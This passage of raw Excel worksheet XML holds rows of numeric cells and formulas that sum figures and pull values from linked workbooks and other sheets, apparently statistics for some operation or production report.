      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]3'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]3'!$E$17</f>
        <v>6539</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'2'!H22</f>
        <v>19694</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2050675</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]3'!$I$17</f>
        <v>6018.88</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'2'!K22</f>
        <v>17811.03</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1909272.41</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]3'!$L$17</f>
        <v>191849.322</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>95.924661</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]3'!$W$79</f>
        <v>113.084477011322</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]3'!$X$79</f>
        <v>105.27189230175</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]3'!$Y$79</f>
        <v>102.291875865602</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]3'!$T$79</f>
        <v>38.5405092592593</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]3'!$U$79</f>
        <v>53.9344135802469</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]3'!$V$79</f>
        <v>45.4548920211012</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]3'!$Q$79</f>
        <v>9.24972222222223</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]3'!$R$79</f>
        <v>38.8327777777778</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]3'!$S$79</f>
        <v>3676.39166666667</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]3'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]3'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'2'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]3'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'2'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]3'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]3'!$W$80</f>
        <v>74.4591951295732</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]3'!$X$80</f>
        <v>78.1255425384898</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]3'!$Y$80</f>
        <v>79.1124489050021</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]3'!$T$80</f>
        <v>99.9988425925926</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]3'!$U$80</f>
        <v>55.5551697530864</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]3'!$V$80</f>
        <v>32.7009836245741</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]3'!$Q$80</f>
        <v>23.9997222222222</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]3'!$R$80</f>
        <v>39.9997222222222</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]3'!$S$80</f>
        <v>2644.85555555556</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]3'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]3'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'2'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]3'!$I$56</f>
        <v>2037.88</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'2'!K24</f>
        <v>5372.25</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>285198.78</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]3'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]3'!$R$6</f>
        <v>86.7777777777778</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]3'!$S$6</f>
        <v>87.0877192982456</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]3'!$T$6</f>
        <v>86.1671742744682</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]3'!$O$6</f>
        <v>37.5</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]3'!$P$6</f>
        <v>39.5833333333333</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]3'!$Q$6</f>
        <v>52.2059841740851</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]3'!$L$6</f>
        <v>9</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]3'!$M$6</f>
        <v>28.5</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]3'!$N$6</f>
        <v>4222.42</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]3'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'2'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]3'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'2'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]3'!$R$7</f>
        <v>202.5</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]3'!$S$7</f>
        <v>197.514563106796</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]3'!$T$7</f>
        <v>187.634654289547</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]3'!$O$7</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]3'!$P$7</f>
        <v>35.7638888888889</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]3'!$Q$7</f>
        <v>50.0535361028684</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]3'!$L$7</f>
        <v>8</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]3'!$M$7</f>
        <v>25.75</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]3'!$N$7</f>
        <v>4048.33</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'2'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'2'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]3'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]3'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]3'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]3'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]3'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]3'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]3'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]3'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]3'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'2'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'2'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]3'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]3'!$X$69</f>
        <v>22.3117848970252</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]3'!$Y$69</f>
        <v>25.3717628987586</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]3'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]3'!$U$69</f>
        <v>8.79166666666667</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]3'!$V$69</f>
        <v>67.8439663699308</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]3'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]3'!$R$69</f>
        <v>6.33</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]3'!$S$69</f>
        <v>5487.22</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'2'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'2'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]3'!$W$104</f>
        <v>27.894173421007</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]3'!$X$104</f>
        <v>28.5162993805208</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]3'!$Y$104</f>
        <v>25.9805573709955</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]3'!$T$104</f>
        <v>100</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]3'!$U$104</f>
        <v>100</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]3'!$V$104</f>
        <v>64.6890454995054</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]3'!$Q$104</f>
        <v>24</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]3'!$R$104</f>
        <v>72</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]3'!$S$104</f>
        <v>5232.05</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'2'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'2'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]3'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]3'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]3'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]3'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]3'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]3'!$V$105</f>
        <v>34.6708951533136</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]3'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]3'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]3'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'2'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'2'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]3'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]3'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]3'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]3'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]3'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]3'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]3'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]3'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]3'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]3'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]3'!$E$16</f>
        <v>3911</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'2'!H31</f>
        <v>9506</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1382513</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]3'!$I$16</f>
        <v>3666.18</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'2'!K31</f>
        <v>14662.2</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1370710.33</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]3'!$L$16</f>
        <v>60273.17</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>80.3642266666667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'[11]3'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]3'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'2'!H32</f>
        <v>1748</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1529591</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]3'!$I$13</f>
        <v>2997</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'2'!K32</f>
        <v>7202</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1028680</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]3'!$L$13</f>
        <v>54316.616</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>108.633232</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]3'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]3'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]3'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]3'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]3'!$U$76</f>
        <v>2.77777777777778e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]3'!$V$76</f>
        <v>4.10484668644906e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]3'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]3'!$R$76</f>
        <v>2e-11</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]3'!$S$76</f>
        <v>3.32e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]3'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'2'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]3'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'2'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]3'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]3'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]3'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]3'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]3'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]3'!$U$77</f>
        <v>1.38888888888889e-11</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]3'!$V$77</f>
        <v>62.5595944609313</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]3'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]3'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]3'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]3'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'2'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]3'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'2'!K34</f>
        <v>666.89</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>467869.82</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]3'!$L$15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'[11]3'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'2'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]3'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'2'!K35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G36+'2'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'2'!K36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G37+'2'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'2'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]3'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]3'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]3'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'2'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]3'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'2'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]3'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'2'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'2'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]3'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]3'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]3'!$R$10</f>
        <v>193.24</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'2'!U38</f>
        <v>2026.56</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>261166.28</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]3'!$V$10</f>
        <v>820</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'2'!X38</f>
        <v>2468</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>258575</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]3'!$Y$10</f>
        <v>9203.891</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'2'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'2'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]3'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]3'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]3'!$R$50</f>
        <v>369.32</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'2'!U39</f>
        <v>965.98</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>79779.579</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]3'!$V$50</f>
        <v>233</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'2'!X39</f>
        <v>728</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>79487</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]3'!$Y$50</f>
        <v>1469.526</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'2'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'2'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]3'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]3'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]3'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]3'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]3'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]3'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]3'!$W$44</f>
        <v>0</v>
      </c>
